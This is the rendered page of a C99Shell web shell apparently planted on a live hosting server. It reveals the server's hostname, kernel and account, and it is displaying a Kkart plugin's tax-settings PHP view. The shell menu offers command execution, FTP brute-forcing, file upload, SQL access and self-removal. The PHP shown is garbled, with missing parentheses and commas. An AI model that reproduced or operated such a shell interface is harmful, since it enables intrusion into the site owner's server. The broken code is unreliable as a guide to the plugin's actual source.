!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/includes/admin/settings/views/   drwxr-xr-x
Free 289.7 GB of 429.69 GB (67.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     html-settings-tax.php (7.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Admin view: Settings tax
 *
 * @package Kkart\Admin\Settings
 */

if ( ! defined'ABSPATH' ) ) {
    exit;
}
?>

<div class="kkart-tax-rates-search" id="rates-search">
    <input type="search" class="kkart-tax-rates-search-field" placeholder="<?php esc_attr_e'Search&hellip;''kkart' ); ?>" value="<?php echo isset( $_GET['s'] ) ? esc_attr$_GET['s'] ) : ''?>" />
</div>

<div id="rates-pagination"></div>

<h3>
    <?php
    
/* translators: %s: tax rate */
    
printf(
        
__'"%s" tax rates''kkart' ),
        
$current_class esc_html$current_class ) : __'Standard''kkart' )
    );
    
?>
</h3>

<table class="kkart_tax_rates kkart_input_table widefat">
    <thead>
        <tr>
            <th width="8%"><a href="https://en.wikipedia.org/wiki/ISO_3166-1#Current_codes" target="_blank"><?php _e'Country&nbsp;code''kkart' ); ?></a>&nbsp;<?php echo kkart_help_tip__'A 2 digit country code, e.g. US. Leave blank to apply to all.''kkart' ) ); ?></th>
            <th width="8%"><?php _e'State code''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'A 2 digit state code, e.g. AL. Leave blank to apply to all.''kkart' ) ); ?></th>
            <th><?php _e'Postcode / ZIP''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'Postcode for this rule. Semi-colon (;) separate multiple values. Leave blank to apply to all areas. Wildcards (*) and ranges for numeric postcodes (e.g. 12345...12350) can also be used.''kkart' ) ); ?></th>
            <th><?php _e'City''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'Cities for this rule. Semi-colon (;) separate multiple values. Leave blank to apply to all cities.''kkart' ) ); ?></th>
            <th width="8%"><?php _e'Rate&nbsp;%''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'Enter a tax rate (percentage) to 4 decimal places.''kkart' ) ); ?></th>
            <th width="8%"><?php _e'Tax name''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'Enter a name for this tax rate.''kkart' ) ); ?></th>
            <th width="8%"><?php _e'Priority''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'Choose a priority for this tax rate. Only 1 matching rate per priority will be used. To define multiple tax rates for a single area you need to specify a different priority per rate.''kkart' ) ); ?></th>
            <th width="8%"><?php _e'Compound''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'Choose whether or not this is a compound rate. Compound tax rates are applied on top of other tax rates.''kkart' ) ); ?></th>
            <th width="8%"><?php _e'Shipping''kkart' ); ?>&nbsp;<?php echo kkart_help_tip__'Choose whether or not this tax rate also gets applied to shipping.''kkart' ) ); ?></th>
        </tr>
    </thead>
    <tfoot>
        <tr>
            <th colspan="9">
                <a href="#" class="button plus insert"><?php _e'Insert row''kkart' ); ?></a>
                <a href="#" class="button minus remove_tax_rates"><?php _e'Remove selected row(s)''kkart' ); ?></a>
                <a href="#" download="tax_rates.csv" class="button export"><?php _e'Export CSV''kkart' ); ?></a>
                <a href="<?php echo admin_url'admin.php?import=kkart_tax_rate_csv' ); ?>" class="button import"><?php _e'Import CSV''kkart' ); ?></a>
            </th>
        </tr>
    </tfoot>
    <tbody id="rates">
        <tr>
            <th colspan="9" style="text-align: center;"><?php esc_html_e'Loading&hellip;''kkart' ); ?></th>
        </tr>
    </tbody>
</table>

<script type="text/html" id="tmpl-kkart-tax-table-row">
    <tr class="tips" data-tip="<?php printfesc_attr__'Tax rate ID: %s''kkart' ), '{{ data.tax_rate_id }}' ); ?>" data-id="{{ data.tax_rate_id }}">
        <td class="country">
            <input type="text" value="{{ data.tax_rate_country }}" placeholder="*" name="tax_rate_country[{{ data.tax_rate_id }}]" class="kkart_input_country_iso" data-attribute="tax_rate_country" style="text-transform:uppercase" />
        </td>

        <td class="state">
            <input type="text" value="{{ data.tax_rate_state }}" placeholder="*" name="tax_rate_state[{{ data.tax_rate_id }}]" data-attribute="tax_rate_state" />
        </td>

        <td class="postcode">
            <input type="text" value="<# if ( data.postcode ) print( _.escape( data.postcode.join( '; ' ) ) ); #>" placeholder="*" data-name="tax_rate_postcode[{{ data.tax_rate_id }}]" data-attribute="postcode" />
        </td>

        <td class="city">
            <input type="text" value="<# if ( data.city ) print( _.escape( data.city.join( '; ' ) ) ); #>" placeholder="*" data-name="tax_rate_city[{{ data.tax_rate_id }}]" data-attribute="city" />
        </td>

        <td class="rate">
            <input type="text" value="{{ data.tax_rate }}" placeholder="0" name="tax_rate[{{ data.tax_rate_id }}]" data-attribute="tax_rate" />
        </td>

        <td class="name">
            <input type="text" value="{{ data.tax_rate_name }}" name="tax_rate_name[{{ data.tax_rate_id }}]" data-attribute="tax_rate_name" />
        </td>

        <td class="priority">
            <input type="number" step="1" min="1" value="{{ data.tax_rate_priority }}" name="tax_rate_priority[{{ data.tax_rate_id }}]" data-attribute="tax_rate_priority" />
        </td>

        <td class="compound">
            <input type="checkbox" class="checkbox" name="tax_rate_compound[{{ data.tax_rate_id }}]" <# if ( parseInt( data.tax_rate_compound, 10 ) ) { #> checked="checked" <# } #> data-attribute="tax_rate_compound" />
        </td>

        <td class="apply_to_shipping">
            <input type="checkbox" class="checkbox" name="tax_rate_shipping[{{ data.tax_rate_id }}]" <# if ( parseInt( data.tax_rate_shipping, 10 ) ) { #> checked="checked" <# } #> data-attribute="tax_rate_shipping" />
        </td>
    </tr>
</script>

<script type="text/html" id="tmpl-kkart-tax-table-row-empty">
    <tr>
        <th colspan="9" style="text-align:center"><?php esc_html_e'No matching tax rates found.''kkart' ); ?></th>
    </tr>
</script>

<script type="text/html" id="tmpl-kkart-tax-table-pagination">
    <div class="tablenav">
        <div class="tablenav-pages">
            <span class="displaying-num">
                <?php
                
/* translators: %s: number */
                
printf(
                    
__'%s items''kkart' ), // %s will be a number eventually, but must be a string for now.
                    
'{{ data.qty_rates }}'
                
);
                
?>
            </span>
            <span class="pagination-links">

                <a class="tablenav-pages-navspan" data-goto="1">
                    <span class="screen-reader-text"><?php esc_html_e'First page''kkart' ); ?></span>
                    <span aria-hidden="true">&laquo;</span>
                </a>
                <a class="tablenav-pages-navspan" data-goto="<# print( Math.max( 1, parseInt( data.current_page, 10 ) - 1 ) ) #>">
                    <span class="screen-reader-text"><?php esc_html_e'Previous page''kkart' ); ?></span>
                    <span aria-hidden="true">&lsaquo;</span>
                </a>

                <span class="paging-input">
                    <label for="current-page-selector" class="screen-reader-text"><?php esc_html_e'Current page''kkart' ); ?></label>
                    <?php
                        
/* translators: 1: current page 2: total pages */
                        
printf(
                            
esc_html_x'%1$s of %2$s''Pagination''kkart' ),
                            
'<input class="current-page" id="current-page-selector" type="text" name="paged" value="{{ data.current_page }}" size="<# print( data.qty_pages.toString().length ) #>" aria-describedby="table-paging">',
                            
'<span class="total-pages">{{ data.qty_pages }}</span>'
                        
);
                    
?>
                </span>

                <a class="tablenav-pages-navspan" data-goto="<# print( Math.min( data.qty_pages, parseInt( data.current_page, 10 ) + 1 ) ) #>">
                    <span class="screen-reader-text"><?php esc_html_e'Next page''kkart' ); ?></span>
                    <span aria-hidden="true">&rsaquo;</span>
                </a>
                <a class="tablenav-pages-navspan" data-goto="{{ data.qty_pages }}">
                    <span class="screen-reader-text"><?php esc_html_e'Last page''kkart' ); ?></span>
                    <span aria-hidden="true">&raquo;</span>
                </a>

            </span>
        </div>
    </div>
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.095 ]--